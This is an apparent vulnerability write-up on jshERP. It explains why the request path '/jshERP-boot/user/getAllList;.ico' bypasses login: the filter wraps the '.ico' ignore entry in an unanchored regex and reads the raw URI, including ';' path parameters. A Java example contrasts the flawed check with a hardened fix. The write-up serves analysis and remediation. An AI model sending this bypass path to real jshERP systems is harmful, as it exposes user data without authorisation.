PoC:
/jshERP-boot/user/getAllList;.ico
Debugging and analysis of the PoC:
This PoC is clearly a permission bypass, so we analyse the code inside the filter.
@Override
public void doFilter(ServletRequest request, ServletResponse response, FilterChain chain) throws IOException, ServletException {
    HttpServletRequest servletRequest = (HttpServletRequest) request;
    HttpServletResponse servletResponse = (HttpServletResponse) response;
    String requestUrl = servletRequest.getRequestURI();
    // Concretely: if the user is not logged in, redirect to the login page
    Object userId = redisService.getObjectFromSessionByKey(servletRequest, "userId");
    if (userId != null) { // already logged in: do not block
        chain.doFilter(request, response);
        return;
    }
    if (requestUrl != null && (requestUrl.contains("/doc.html") ||
            requestUrl.contains("/register.html") || requestUrl.contains("/login.html"))) {
        chain.doFilter(request, response);
        return;
    }
    if (verify(ignoredList, requestUrl)) {
        chain.doFilter(servletRequest, response);
        return;
    }
    if (null != allowUrls && allowUrls.length > 0) {
        for (String url : allowUrls) {
            if (requestUrl.startsWith(url)) {
                chain.doFilter(request, response);
                return;
            }
        }
    }
    servletResponse.sendRedirect("/login.html");
}
The point to focus on here is the verify method, the only place whose input we control. Analysing the verify method:
private static String regexPrefix = "^.*";
private static String regexSuffix = ".*$";

private static boolean verify(List<String> ignoredList, String url) {
    for (String regex : ignoredList) {
        Pattern pattern = Pattern.compile(regexPrefix + regex + regexSuffix);
        Matcher matcher = pattern.matcher(url);
        if (matcher.matches()) {
            return true;
        }
    }
    return false;
}
The point to focus on here is the value of ignoredList; reading the code that builds it shows that ignoredList is derived from ignoredUrl.
ignoredUrl takes its default value, ".ico".
Because verify wraps each entry in "^.*" and ".*$", the check passes as soon as ".ico" appears anywhere in the request URI, not only at the end. getRequestURI() returns the raw path including the ";.ico" path parameter, so the filter sees ".ico" and lets the request through, while the servlet container still dispatches it to /user/getAllList. That is why a PoC whose path ends in ";.ico" bypasses the permission check: the semicolon separates the path parameter from the real resource.
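The following is an added example, not code from jshERP or from this write-up. It reproduces the page's verify logic as verifyLoose and places a hardened variant, verifyStrict, beside it; verifyStrict is an assumption about how one could fix the check, not the project's actual patch. The hardened version strips ";..." path parameters and the query string, refuses dot-segment traversal, and treats the ignored entry as a literal suffix of the cleaned path rather than as an unanchored regex.

```java
import java.util.List;
import java.util.regex.Pattern;

public class IgnoredUrlCheck {
    // Same construction as the page's filter: "^.*" + entry + ".*$" makes every
    // entry a substring match, and an unescaped "." in ".ico" matches any character.
    private static final String REGEX_PREFIX = "^.*";
    private static final String REGEX_SUFFIX = ".*$";

    /** Mirrors the vulnerable verify(): true if any ignored pattern occurs anywhere in the URL. */
    static boolean verifyLoose(List<String> ignoredList, String url) {
        for (String regex : ignoredList) {
            if (Pattern.compile(REGEX_PREFIX + regex + REGEX_SUFFIX).matcher(url).matches()) {
                return true;
            }
        }
        return false;
    }

    /**
     * Hardened variant (assumed fix, not the project's code): normalise the request URI
     * before comparing, then require the static-file suffix at the end of the real path.
     */
    static boolean verifyStrict(List<String> ignoredSuffixes, String requestUri) {
        if (requestUri == null) {
            return false;
        }
        String path = requestUri;
        // Drop the query string; it is not part of the resource path.
        int q = path.indexOf('?');
        if (q >= 0) {
            path = path.substring(0, q);
        }
        // Remove ";..." path parameters from every segment, so that
        // "/user/getAllList;.ico" is compared as "/user/getAllList".
        path = path.replaceAll(";[^/]*", "");
        // Refuse dot-segment traversal instead of trying to resolve it here.
        if (path.contains("/../") || path.endsWith("/..")) {
            return false;
        }
        // Literal suffix comparison: no regex metacharacters are interpreted.
        for (String suffix : ignoredSuffixes) {
            if (path.endsWith(suffix)) {
                return true;
            }
        }
        return false;
    }

    public static void main(String[] args) {
        List<String> ignored = List.of(".ico");           // default ignoredUrl value reported on the page
        String poc = "/jshERP-boot/user/getAllList;.ico"; // the page's PoC path
        System.out.println("loose  (PoC)        : " + verifyLoose(ignored, poc));            // true  -> bypass
        System.out.println("strict (PoC)        : " + verifyStrict(ignored, poc));           // false -> login required
        System.out.println("strict (favicon)    : " + verifyStrict(ignored, "/favicon.ico")); // true  -> still allowed
        System.out.println("loose  (/api/xico)  : " + verifyLoose(ignored, "/api/xico"));     // true  -> unescaped '.'
    }
}
```

The contrast in main shows the two defects together: the loose check accepts the PoC because it only needs ".ico" somewhere in the raw URI, and it also accepts paths such as /api/xico because the dot in the configured value is a regex wildcard. The strict check keeps the intended behaviour for genuine static resources such as /favicon.ico while rejecting the path-parameter form.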